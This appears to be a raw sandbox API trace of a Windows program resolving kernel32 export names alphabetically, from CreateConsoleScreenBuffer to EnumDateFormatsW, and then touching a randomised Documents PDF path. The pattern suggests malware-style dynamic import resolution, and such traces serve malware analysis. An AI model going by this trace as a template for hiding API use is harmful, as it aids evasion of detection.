(lpString="CREATECONSOLESCREENBUFFER") returned 25 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0084.824] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0084.824] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0084.824] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0084.824] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0084.824] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0084.824] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0084.824] lstrlenA (lpString="CREATEEVENTA") returned 12 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0084.824] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0084.824] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0084.824] lstrlenA (lpString="CREATEEVENTW") returned 12 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0084.824] lstrlenA (lpString="CREATEFIBER") returned 11 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0084.824] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0084.824] lstrlenA (lpString="CREATEFILEA") returned 11 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0084.824] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0084.824] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0084.825] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0084.825] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0084.825] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0084.825] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0084.825] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0084.825] lstrlenA (lpString="CREATEFILEW") returned 11 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0084.825] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0084.825] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0084.825] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0084.825] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0084.825] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0084.825] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0084.825] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0084.825] lstrlenA (lpString="CREATEJOBSET") returned 12 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0084.825] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0084.825] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0084.825] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0084.825] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0084.825] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0084.825] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0084.826] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0084.826] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0084.826] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0084.826] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0084.826] lstrlenA (lpString="CREATEPIPE") returned 10 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0084.826] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0084.826] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0084.826] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0084.826] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0084.826] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0084.826] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0084.826] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0084.826] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0084.826] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0084.826] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0084.826] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0084.826] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0084.826] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0084.826] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0084.827] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0084.827] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0084.827] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.827] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.827] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.827] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.827] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.827] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.827] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.827] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.827] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.827] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.827] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.827] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.827] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.827] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.827] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.827] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.827] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.828] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.828] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.828] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.828] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.828] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.828] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.828] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.828] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.828] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.828] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.828] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.828] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.828] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.828] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.828] lstrlenA (lpString="DELETEATOM") returned 10 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.828] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.828] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.828] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.828] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.829] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.829] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.829] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.829] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.829] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.829] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.829] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.829] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.829] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.839] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.839] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.839] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.839] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.839] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.839] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.839] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.839] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.839] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.839] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.839] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.839] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.839] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.839] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.840] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.840] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.840] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.840] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.840] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.840] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.840] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.840] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.840] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.840] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.840] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.840] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.840] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.840] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.840] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.841] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.841] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\YeFEah28pGy.pdf") returned 72 [0084.841] 